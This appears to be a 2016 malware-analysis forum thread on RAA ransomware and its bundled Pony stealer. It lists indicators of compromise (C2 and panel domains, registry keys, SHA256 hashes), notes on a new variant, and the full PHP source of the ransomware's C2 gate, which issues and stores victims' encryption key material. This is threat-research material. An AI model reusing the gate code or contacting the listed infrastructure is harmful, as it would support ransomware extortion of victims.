A forum for reverse engineering, OS internals and malware analysis 

RAA ransomware drops also Pony

Forum for analysis and discussion about malware.

Re: RAA ransomware drops also Pony

 #28733  by Antelox
 Wed Jun 22, 2016 8:40 am
New domain
attachment-load\.com
Registry key name changed
HKCU\\JIMBO\\JIMBOFNL\\
Pony panel
kwjeyweqer\.com/admin.php
JS + Pony in attachment.

BR,

Antelox
infected
(228.24 KiB) Downloaded 77 times
Pony: Infected
(128.87 KiB) Downloaded 70 times

Re: RAA ransomware drops also Pony

 #28781  by benkow_
 Wed Jun 29, 2016 7:28 am
Here we go:
Source code attached
gate mars.php
Code: Select all
<?php
include('Crypt/RSA.php');
error_reporting( E_ERROR );
$rsa = new Crypt_RSA();
$PubKey = file_get_contents('public_key.pem');
$rsa ->loadKey($PubKey);
if (isset($_GET['id']) && $_GET['id'] != '0') {
    $a = $_GET['id'];
    $b = 'RAA';
        if (strpos($a, $b) > 0 && strlen ($a) >= 25) {  
            $filename = "./cl/".$a;
            file_put_contents($filename, "", FILE_APPEND | LOCK_EX);
            $i = 250;
            $bytes = openssl_random_pseudo_bytes($i, $cstrong);
            $hex = bin2hex($bytes);
            $bytes1 = openssl_random_pseudo_bytes($i, $cstrong);
            $hex1 = bin2hex($bytes1);
            $bytes2 = openssl_random_pseudo_bytes($i, $cstrong);
            $hex2 = bin2hex($bytes2);
            $iv = openssl_random_pseudo_bytes($i, $cstrong);
            $iv2hex = bin2hex($iv);
            $dat_file="counter_tips"; 
            $f=fopen($dat_file,"r");
            $count=fgets($f,100000);
            fclose($f);
            $count=ereg_replace(" ","",$count); 
            $count++; 
            $f=fopen($dat_file,"w");
            fputs($f,"$count ");
        if (strpos($a,"DOUBLE") !== FALSE) {
            $dat_file2="double_tips"; 
            $f2=fopen($dat_file2,"r");
            $count2=fgets($f2,100000);
            fclose($f2);
            $count2=ereg_replace(" ","",$count2); 
            $count2++; 
            $f2=fopen($dat_file2,"w");
            fputs($f2,"$count2 ");
        }
            $file = "adr_base";
            $total_adr = file_get_contents($file);
            $total_adr = explode ("END", $total_adr);
            $adr = $total_adr[$count-1];
            fclose($f);
            echo $hex.$hex1.$hex2.$iv2hex,',', $adr,',';
            $data = $hex.','.$hex1.','.$hex2.','.$iv2hex.','.$a.','.$adr;
            $array_d = explode(',', $data);
            $point_r = -1;
            $filename = "./cl/".$a;
            do {
            $point_r += 1; 
            $encrypted_data[$point_r] = $rsa->encrypt($array_d[$point_r]);
            $encrypted_data[$point_r] = $encrypted_data[$point_r]."SEPARATOR";            
            } while ($point_r < 5);
            $enc_str = implode("", $encrypted_data);
            file_put_contents($filename, $enc_str, FILE_APPEND | LOCK_EX);
        } else {
            echo "INVALID ID";
        }
} else {
    echo "INVALID REQUEST";
}
?>
Attachments
infected
(425.99 KiB) Downloaded 75 times

Re: RAA ransomware drops also Pony

 #28782  by Antelox
 Wed Jun 29, 2016 7:54 am
This is a great work benkow_! :D

I found yesterday instead the email sample related to RAA spam campaign.

Inside the zip the LNK which downloads the js.
email_RAA.png
email_RAA.png (14.66 KiB) Viewed 530 times
BR,

Antelox

Re: RAA ransomware drops also Pony

 #29134  by Antelox
 Mon Aug 29, 2016 6:08 pm
New RAA ransomware variant spotted in the wild

Sample: https://virustotal.com/en/file/a269f8c3 ... /analysis/

Differences spotted in this new RAA ransomware variant are:

- Javascript payload dropped by a .doc which embeds it (https://gist.github.com/Antelox/e33e957 ... e50cbd5ec1);
- New refund file;
- No callback to C2. String to build key and IV saved on disk base64 encoded (so is it now decryptable? - we have to investigate deeper);
- Calls SystemFunction036 (RtlGenRandom) API function through DynamicWrapperX.2 ActiveXObject. The DLL for 32 or 64 OS platform is dropped by the JScript);
- Registry key changed (HKCU\\Hff\\Hff-fnl\\)

SHA256 hashes

doc
01a48d1d0cb72c3940ba8e0fe0642a376fb38048ab06bd5cf869096ca44410b7
0d803451826a8ebd9d95d8e914d15c85d944d15c7dab6251cc762d615269e50d
0fde617d06361a602546f547b0c845e5083ad3d75815b380e8212915fe8d21a0
11e840f2c719aa57b6d817cc8bc082431e3d1065a5cbca2c3aee4eccee61ab6d
14079908b52f7e07f5aa356e072c208d444c5dc4e87888da1e596531fab839b8
16239af709caf15b1d39e8955e5668a5e57aafcee411cd0583d845e804c0a7a3
1e542aa93aaf333e86052f2044d6bcc1b8136e8fcb6bda56388444f562d37ff0
21a355c0d5131bf1047c4998a446f7c80db4efb001fa2a8f82cf4e49d0e580ba
23ce785f4ec5f40172a8ab1fdcf7a0b04d5fe0bfa9b336a4a46d8b1ff410137b
26337995617c1134ec45e42f2d052e85aacb0ba7313bdbf0a5ec864352ef6ce6
2ad693a726a42337e9cab4921bd0772ba78c26737a97585da2486244d8e443ee
2bb2143cfdb7d76177d0b79d2fbc67a42d905c72ca544c077f1be1be8b9084a0
2e894d6da13948e37abf97262c559a9d49ccfa8e5aceafeb256979a98d6add75
3163e953d0ec1e16cda492bd93ac87080be700bca211793f5e5c604457907bca
3550d5413806e67db4909ceaa398acb5549f63145cc27513c45af43473e15e88
356c9e91c47f2e37281dbf4f92c13deda2e2f54cde8b7ca2a6d53078ea17a393
365f2c7606a041054b49826e69e19570259e5a141baeb570e6169f0f58a52763
3983a5d21c2ccb158e1da962460c7eedbede60d47f6571cce6a312fa24fe2d95
3af10bcffa680b7e360e51f1726fb4f3523b48d0d7679604c9bfb72d674ba03d
3d1a903c3cc3c7fbb0e19fdca2110e3e310869009cdf2baa4d535de864741350
476fd2cd7607d06949df46683cff80b46421ce9002008e9aaea7cfa5b3f5baf1
47cde16a8c565b7d2bed64b353f9cf3c9722d0b3fd669bd7ded0fffe0e59779c
48e2340dfdba91bf04001e517f930cba1c458f97a0a86eecfbefc01ca0e28e95
49f109d5ed56d2bd4ec632a4a9b8055daf70a465b82cf0e76df79a97c61130c5
4b6b8ee5850522ef87729ac8dbafef412c36a33196f7c8a8556aa3fe0fbf08ed
4cc93725a5e8789dd27b9cfc9a78bc1b730eb87c7e473548039b407e97d9589c
4d35cf9d4679871b92e9528f3c46938ee0bb948ada3b43339ce12974fcc8126a
55dac85f8a1d33a4b3b30d947935bc93fd4e0a2511c5543571d6e415240efea9
5b345d2bd1d9de0b2fa2bea4ff876e61db7027b424d4e3f0bf3593957c620873
675b9db5a7bd9e5f3229b3c078500248fda02871fe141c5a59f5b5e82b556f98
68172fe733414d6ebd6879274716b8cd33cdc3e77e1be2ec7ef2ffe30a0ce395
6818cbea462b9baedcb01b7154bedf7c7f533b45ef82b4d1cb9c64154213c0fc
6a4ccd88dd022dec0b5ed38e7f1c7328bde63b4f245091cd1aab3271b0907b87
71712819159b4998c26d11fd099f8ab4141806e4899f62c2189e2c6d0d5a08f5
72b838c17b3ed73bbdb1831f84bbc57b258fa7d288d5407ce81522b2fd33fc9f
79205c75e2814b4199783c2a8c7d089856d2f4fa8b784e2b7bf1bd6c44adc086
7a30d5606723ddd59cce4b72c10f335a540ea01c55b0459dc1d09ba4bad63ac7
834c9e8cb35a4ba3c440c22b1309c1fe8862adfb5b97026f0a11ca4060f98bff
89081fedbf1aa410d20a98f15eb6a80b0dbbfb4446f22a3a95feba94871f9d32
8ae0bb1eb30ae4bd2bdca00366f01e5cd83f9ab406957f338bd72d3d1809d24d
8bc748972f101dc344d35af8933b15a690dcb0d4869b03c9890425c7ae10bef1
8f3658d149bf339fd32e0241e683493bdc3e556adf2ccd83c8a340c43dba7839
946b1deb3045aeefebd9375660a722b0083526801a3c1e74d41eac7a86d5fbdf
94b5c915bb639470f97a5493b00ae4df00d88d3f32c8dc4d4f73624a27a0f25e
9874469c0638d2bf47a22d03345ee299701700c7fe447624bc5a71fb649bcbc4
a0206456e4de00d594d4c04c4f922740552827a140b1a3d6bcc64085bab55761
a269f8c3c623e271bc78e27297819697343ac8155f6ee0a2d6ca14fa8271a851
a48ba816fce0fa413f821c39114533432ea771cab1de22cb8cd7108b046fa63c
aaa811fa0223825baf0819aea927682fb8c310d0250e4853b87ab88f5aeae24e
b7851384a368b269a6b6b3b7506e0e41888bf9e9362da7752130c2171d704423
b8f0c196e4442d044bf7057f89164d9e8f9bdb5f3eac6ac99c5bf8ac2f2837c5
badf22fdd1eb26f37e8bf81d3ef64e2aaaa7ead0a3c71d26231c418c584b65ec
bcd81ed63141e6bc1a3014bad6e9da664c42df3e8a4e2038114da2e87a5b107d
bf03e4a3bb1a12c4044f78461e225dcf0206a2252645adf22ed9cbb4c7d00aaf
bf6c1005278617e45c8b633a662d1d6810b99df173cdef625528a08c527a35b5
c0a4b6be4bb4caa15db5f2b9a9bacb629783f30f5ba28178bc59a251a61e65c3
c827017c1eb240adec6191d3f23996705cbf94df901f89b31931133a18b3e815
cbd5e584a78c3f156fc9af26e5af55712fd541a571e3194ded2839fe409bca20
cf1aba37d5db748cdb7b0d76cb52d72ed6eab6ae4ec02201784cc52494f0eec8
d401338188530df7b7fc95846e79d944c91ce0f3deb2ca61a0f3088f3cefff03
d7c339ba42d198c12cb40fb99d0af285b83c8c83ec309d3f3ca1549d1a7dd108
dd655091190645ac9808a9a0faa825326dd6a0c9f89b419eda55a6fd5b3a8fcc
dd9e19b9123436d33f66586395d737a558573c62c80a0329e4d5d5e2a6c76197
de6d54e687cbc092a77dc290659574ee712987892b8692924dcbd8f938d00217
e19fe14ae48e4920fcdb045a5fb7f9ee88925a95346f1b2e9a6d7bbfe1664c76
e1cd147e6f60525af5317f64adce6ce54726f5d324476d140101a8c6c35c975d
e3e62c5dda820bbe709cf63133177de816d19385901f9c2b26b4ac578a21baf6
e494fa28e75805f567c185a0e8c24745ee51952facac3817fc4add6d2e257cc8
eb8fb37162bbd70e2def037c22ad1bcd0f8860caa89c8d39066e277e7d9e5d29
ececbfb36cfbe7d00829b438c850b688b7c9ac9e8cf5809fc048b2e0d7b5275c
ee575215968686fe85fd2c6d96e7a2edf5147eb4634eb887524dc1181cfeb06b
fc1fb4b75dae157c3033772314733656eefcea39de29026eba9944262fcf28b2
fc71aaa0c206bf3ab74eb2310eba05c7419d0b2e793043b1569a46bd2219a845
fdf041bf4073d6f2429a5d24f5fa8ce7b2fa89c318ab51611f9d26fbaf234e55
JS
b7851384a368b269a6b6b3b7506e0e41888bf9e9362da7752130c2171d704423
Pony
287d04e44ccdc03e00f30832c66d301082163c8430aeffc732b494280dd8e193
C2
vineprincs.com/gate.php
Panel
vineprincs.com/admin.php
BR,

Antelox
 Return to “Malware”